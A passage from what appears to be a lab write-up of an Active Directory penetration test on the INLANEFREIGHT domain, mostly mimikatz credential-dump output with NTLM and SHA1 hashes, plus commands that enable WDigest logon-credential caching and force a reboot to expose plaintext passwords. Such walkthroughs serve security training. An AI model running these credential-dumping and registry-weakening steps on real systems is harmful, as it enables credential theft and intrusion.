</span><span class="nx">5c</span><span class="w"> </span><span class="nx">29</span><span class="w"> </span><span class="nx">ce</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">f6</span><span class="w"> </span><span class="nx">08</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">d7</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">74</span><span class="w"> </span><span class="nx">98</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="nx">3e</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">a7</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">0e</span><span class="w"> </span><span class="nx">db</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">df</span><span class="w"> </span><span class="nx">f2</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">27</span><span class="w"> </span><span class="nx">1a</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">6b</span><span class="w"> </span><span class="nx">67</span><span class="w"> </span><span class="nx">2f</span><span class="w"> </span><span class="nx">65</span><span class="w"> </span><span class="nx">07</span><span class="w"> </span><span class="nx">cc</span><span class="w"> </span><span class="nx">4c</span><span class="w"> </span><span class="nx">39</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">51</span><span class="w"> </span><span class="nx">1c</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">33</span><span class="w"> </span><span class="nx">c7</span><span class="w"> </span><span class="nx">f0</span><span class="w"> </span><span class="nx">ed</span><span class="w"> </span><span class="nx">1b</span><span class="w"> </span><span class="nx">86</span><span class="w"> </span><span class="nx">0b</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">07</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">eb</span><span class="w"> </span><span class="nx">a2</span><span class="w"> </span><span class="nx">e9</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">dc</span><span class="w"> </span><span class="nx">a7</span><span class="w"> </span><span class="nx">8b</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">ac</span><span class="w"> </span><span class="nx">6d</span><span class="w"> </span><span class="nx">7d</span><span class="w"> </span><span class="nx">74</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">92</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">61</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">33</span><span class="w"> </span><span class="nx">49</span><span class="w"> </span><span class="nx">a8</span><span class="w"> </span><span class="nx">1b</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">96</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">a0</span><span class="w"> </span><span class="nx">d0</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">3b</span><span class="w"> </span><span class="nx">7f</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">b8</span><span class="w"> </span><span class="nx">8b</span><span class="w"> </span><span class="nx">9e</span><span class="w"> </span><span class="nx">cc</span><span class="w"> </span><span class="nx">6f</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">85</span><span class="w"> </span><span class="nx">b4</span><span class="w"> </span><span class="nx">77</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">f4</span><span class="w"> </span><span class="nx">f5</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">ee</span><span class="w"> </span><span class="nx">d2</span><span class="w"> </span><span class="nx">70</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">d6</span><span class="w"> </span><span class="nx">c8</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="n">ssp</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">credman</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">Authentication</span><span class="w"> </span><span class="nx">Id</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="mi">1308030</span><span class="w"> </span><span class="p">(</span><span class="mi">00000000</span><span class="p">:</span><span class="mi">0013</span><span class="n">f57e</span><span class="p">)</span><span class="w"> </span><span class="n">Session</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">RemoteInteractive</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">2</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Server</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DC01</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Time</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">5/1/2026</span><span class="w"> </span><span class="nx">5:41:37</span><span class="w"> </span><span class="nx">AM</span><span class="w"> </span><span class="n">SID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398-4608</span><span class="w"> </span><span class="n">msv</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="mi">00000003</span><span class="p">]</span><span class="w"> </span><span class="n">Primary</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nx">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">dc3ba1d16d82ac977eea8c22c5de3f82</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">SHA1</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">c052c598aaed303e20658a4a6341320867d8dcc4</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">DPAPI</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">32d87218d6331c60d8448418e504b7df</span><span class="w"> </span><span class="n">tspkg</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">wdigest</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">kerberos</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCAL</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">ssp</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">credman</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">mimikatz</span><span class="p">(</span><span class="n">commandline</span><span class="p">)</span><span class="w"> </span><span class="c"># exit</span><span class="w"> </span><span class="n">Bye</span><span class="o">!</span><span class="w"> </span></code></pre> </div> <p>We got back some NTLM hash but the user we are after has NULL as password. Let's enable WDigest protocol to and try again to see if we would get lucky. Still on the host:<code>172.16.6.50</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\svc_sql.INLANEFREIGHT\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">reg</span><span class="w"> </span><span class="nx">add</span><span class="w"> </span><span class="nx">HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest</span><span class="w"> </span><span class="nx">/v</span><span class="w"> </span><span class="nx">UseLogonCredential</span><span class="w"> </span><span class="nx">/t</span><span class="w"> </span><span class="nx">REG_DWORD</span><span class="w"> </span><span class="nx">/d</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="nx">operation</span><span class="w"> </span><span class="nx">completed</span><span class="w"> </span><span class="nx">successfully.</span><span class="w"> </span></code></pre> </div> <p>Then restart:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\svc_sql.INLANEFREIGHT\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">shutdown.exe</span><span class="w"> </span><span class="nx">/r</span><span class="w"> </span><span class="nx">/t</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="nx">/f</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span></code></pre> </div> <p>Now let's try mimikatz again:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\svc_sql.INLANEFREIGHT\Documents</span><span class="err">&gt;</span><span class="w"> </span><span class="o">.</span><span class="nx">\mimikatz.exe</span><span class="w"> </span><span class="s2">"privilege::debug"</span><span class="w"> </span><span class="s2">"sekurlsa::logonpasswords"</span><span class="w"> </span><span class="s2">"exit"</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="o">.</span><span class="c">#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36</span><span class="w"> </span><span class="o">.</span><span class="c">## ^ ##. "A La Vie, A L'Amour" - (oe.eo)</span><span class="w"> </span><span class="c">## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span><span class="w"> </span><span class="c">## \ / ## &gt; http://blog.gentilkiwi.com/mimikatz</span><span class="w"> </span><span class="s1">'## v ##'</span><span class="w"> </span><span class="n">Vincent</span><span class="w"> </span><span class="nx">LE</span><span class="w"> </span><span class="nx">TOUX</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="n">vincent.letoux</span><span class="err">@</span><span class="nx">gmail.com</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="s1">'#####'</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="n">http://pingcastle.com</span><span class="w"> </span><span class="nx">/</span><span class="w"> </span><span class="nx">http://mysmartlogon.com</span><span class="w"> </span><span class="o">***</span><span class="nx">/</span><span class="w"> </span><span class="n">mimikatz</span><span class="p">(</span><span class="n">commandline</span><span class="p">)</span><span class="w"> </span><span class="c"># privilege::debug</span><span class="w"> </span><span class="n">Privilege</span><span class="w"> </span><span class="s1">'20'</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="n">mimikatz</span><span class="p">(</span><span class="n">commandline</span><span class="p">)</span><span class="w"> </span><span class="c"># sekurlsa::logonpasswords</span><span class="w"> </span><span class="n">Authentication</span><span class="w"> </span><span class="nx">Id</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="mi">55262</span><span class="w"> </span><span class="p">(</span><span class="mi">00000000</span><span class="p">:</span><span class="mi">0000</span><span class="n">d7de</span><span class="p">)</span><span class="w"> </span><span class="n">Session</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Interactive</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DWM-1</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Window</span><span class="w"> </span><span class="nx">Manager</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Server</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Time</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">5/1/2026</span><span class="w"> </span><span class="nx">9:40:36</span><span class="w"> </span><span class="nx">AM</span><span class="w"> </span><span class="n">SID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-90-0-1</span><span class="w"> </span><span class="n">msv</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="mi">00000003</span><span class="p">]</span><span class="w"> </span><span class="n">Primary</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nx">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">2951b92fba38c91eb04c39752106d237</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">SHA1</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ae7ad0461a1f52dec0dfc42d44d939af1d3e7e75</span><span class="w"> </span><span class="n">tspkg</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">wdigest</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">be</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">a5</span><span class="w"> </span><span class="nx">5f</span><span class="w"> </span><span class="nx">82</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">1e</span><span class="w"> </span><span class="nx">a7</span><span class="w"> </span><span class="nx">1e</span><span class="w"> </span><span class="nx">3c</span><span class="w"> </span><span class="nx">2f</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">0e</span><span class="w"> </span><span class="nx">7e</span><span class="w"> </span><span class="nx">83</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">e1</span><span class="w"> </span><span class="nx">52</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">d2</span><span class="w"> </span><span class="nx">11</span><span class="w"> </span><span class="nx">00</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">9d</span><span class="w"> </span><span class="nx">22</span><span class="w"> </span><span class="nx">e1</span><span class="w"> </span><span class="nx">00</span><span class="w"> </span><span class="nx">59</span><span class="w"> </span><span class="nx">3d</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">23</span><span class="w"> </span><span class="nx">11</span><span class="w"> </span><span class="nx">27</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">1c</span><span class="w"> </span><span class="nx">9e</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">99</span><span class="w"> </span><span class="nx">6e</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">c5</span><span class="w"> </span><span class="nx">94</span><span class="w"> </span><span class="nx">5f</span><span class="w"> </span><span class="nx">e4</span><span class="w"> </span><span class="nx">f4</span><span class="w"> </span><span class="nx">d5</span><span class="w"> </span><span class="nx">09</span><span class="w"> </span><span class="nx">75</span><span class="w"> </span><span class="nx">e3</span><span class="w"> </span><span class="nx">b8</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">f9</span><span class="w"> </span><span class="nx">7b</span><span class="w"> </span><span class="nx">d8</span><span class="w"> </span><span class="nx">89</span><span class="w"> </span><span class="nx">31</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">5c</span><span class="w"> </span><span class="nx">64</span><span class="w"> </span><span class="nx">08</span><span class="w"> </span><span class="nx">6a</span><span class="w"> </span><span class="nx">29</span><span class="w"> </span><span class="nx">6f</span><span class="w"> </span><span class="nx">73</span><span class="w"> </span><span class="nx">43</span><span class="w"> </span><span class="nx">ed</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="nx">f5</span><span class="w"> </span><span class="nx">ce</span><span class="w"> </span><span class="nx">0c</span><span class="w"> </span><span class="nx">6d</span><span class="w"> </span><span class="nx">a1</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">70</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">89</span><span class="w"> </span><span class="nx">2d</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">f5</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">1d</span><span class="w"> </span><span class="nx">13</span><span class="w"> </span><span class="nx">3e</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">66</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">1e</span><span class="w"> </span><span class="nx">05</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">4e</span><span class="w"> </span><span class="nx">13</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">5e</span><span class="w"> </span><span class="nx">56</span><span class="w"> </span><span class="nx">d3</span><span class="w"> </span><span class="nx">d8</span><span class="w"> </span><span class="nx">c1</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="nx">5e</span><span class="w"> </span><span class="nx">2f</span><span class="w"> </span><span class="nx">5f</span><span class="w"> </span><span class="nx">e0</span><span class="w"> </span><span class="nx">01</span><span class="w"> </span><span class="nx">ad</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">d3</span><span class="w"> </span><span class="nx">df</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">77</span><span class="w"> </span><span class="nx">c1</span><span class="w"> </span><span class="nx">5b</span><span class="w"> </span><span class="nx">f4</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">76</span><span class="w"> </span><span class="nx">ae</span><span class="w"> </span><span class="nx">4a</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">bf</span><span class="w"> </span><span class="nx">ec</span><span class="w"> </span><span class="nx">b3</span><span class="w"> </span><span class="nx">cc</span><span class="w"> </span><span class="nx">75</span><span class="w"> </span><span class="nx">42</span><span class="w"> </span><span class="nx">9b</span><span class="w"> </span><span class="nx">8f</span><span class="w"> </span><span class="nx">7f</span><span class="w"> </span><span class="nx">fb</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">3e</span><span class="w"> </span><span class="nx">fb</span><span class="w"> </span><span class="nx">73</span><span class="w"> </span><span class="nx">c7</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">00</span><span class="w"> </span><span class="nx">18</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">d7</span><span class="w"> </span><span class="nx">7f</span><span class="w"> </span><span class="nx">a8</span><span class="w"> </span><span class="nx">3b</span><span class="w"> </span><span class="nx">83</span><span class="w"> </span><span class="nx">5a</span><span class="w"> </span><span class="nx">0f</span><span class="w"> </span><span class="nx">35</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">a0</span><span class="w"> </span><span class="nx">ac</span><span class="w"> </span><span class="nx">f7</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">2c</span><span class="w"> </span><span class="nx">e8</span><span class="w"> </span><span class="nx">7c</span><span class="w"> </span><span class="nx">0b</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">51</span><span class="w"> </span><span class="nx">c3</span><span class="w"> </span><span class="nx">42</span><span class="w"> </span><span class="nx">10</span><span class="w"> </span><span class="nx">a6</span><span class="w"> </span><span class="nx">86</span><span class="w"> </span><span class="nx">c4</span><span class="w"> </span><span class="nx">75</span><span class="w"> </span><span class="nx">0a</span><span class="w"> </span><span class="nx">10</span><span class="w"> </span><span class="nx">71</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">fb</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">78</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">21</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">b9</span><span class="w"> </span><span class="nx">71</span><span class="w"> </span><span class="nx">ba</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">67</span><span class="w"> </span><span class="nx">fc</span><span class="w"> </span><span class="nx">03</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">a2</span><span class="w"> </span><span class="nx">e5</span><span class="w"> </span><span class="nx">c5</span><span class="w"> </span><span class="nx">d9</span><span class="w"> </span><span class="nx">c4</span><span class="w"> </span><span class="nx">98</span><span class="w"> </span><span class="nx">da</span><span class="w"> </span><span class="nx">dc</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">5c</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">94</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">18</span><span class="w"> </span><span class="nx">ed</span><span class="w"> </span><span class="nx">25</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">e8</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">9f</span><span class="w"> </span><span class="nx">04</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">7b</span><span class="w"> </span><span class="nx">65</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">e7</span><span class="w"> </span><span class="nx">69</span><span class="w"> </span><span class="nx">17</span><span class="w"> </span><span class="nx">07</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">b4</span><span class="w"> </span><span class="nx">51</span><span class="w"> </span><span class="nx">24</span><span class="w"> </span><span class="nx">e2</span><span class="w"> </span><span class="nx">1a</span><span class="w"> </span><span class="nx">e0</span><span class="w"> </span><span class="nx">99</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="n">kerberos</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCAL</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">be</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">a5</span><span class="w"> </span><span class="nx">5f</span><span class="w"> </span><span class="nx">82</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">1e</span><span class="w"> </span><span class="nx">a7</span><span class="w"> </span><span class="nx">1e</span><span class="w"> </span><span class="nx">3c</span><span class="w"> </span><span class="nx">2f</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">0e</span><span class="w"> </span><span class="nx">7e</span><span class="w"> </span><span class="nx">83</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">e1</span><span class="w"> </span><span class="nx">52</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">d2</span><span class="w"> </span><span class="nx">11</span><span class="w"> </span><span class="nx">00</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">9d</span><span class="w"> </span><span class="nx">22</span><span class="w"> </span><span class="nx">e1</span><span class="w"> </span><span class="nx">00</span><span class="w"> </span><span class="nx">59</span><span class="w"> </span><span class="nx">3d</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">23</span><span class="w"> </span><span class="nx">11</span><span class="w"> </span><span class="nx">27</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">1c</span><span class="w"> </span><span class="nx">9e</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">99</span><span class="w"> </span><span class="nx">6e</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">c5</span><span class="w"> </span><span class="nx">94</span><span class="w"> </span><span class="nx">5f</span><span class="w"> </span><span class="nx">e4</span><span class="w"> </span><span class="nx">f4</span><span class="w"> </span><span class="nx">d5</span><span class="w"> </span><span class="nx">09</span><span class="w"> </span><span class="nx">75</span><span class="w"> </span><span class="nx">e3</span><span class="w"> </span><span class="nx">b8</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">f9</span><span class="w"> </span><span class="nx">7b</span><span class="w"> </span><span class="nx">d8</span><span class="w"> </span><span class="nx">89</span><span class="w"> </span><span class="nx">31</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">5c</span><span class="w"> </span><span class="nx">64</span><span class="w"> </span><span class="nx">08</span><span class="w"> 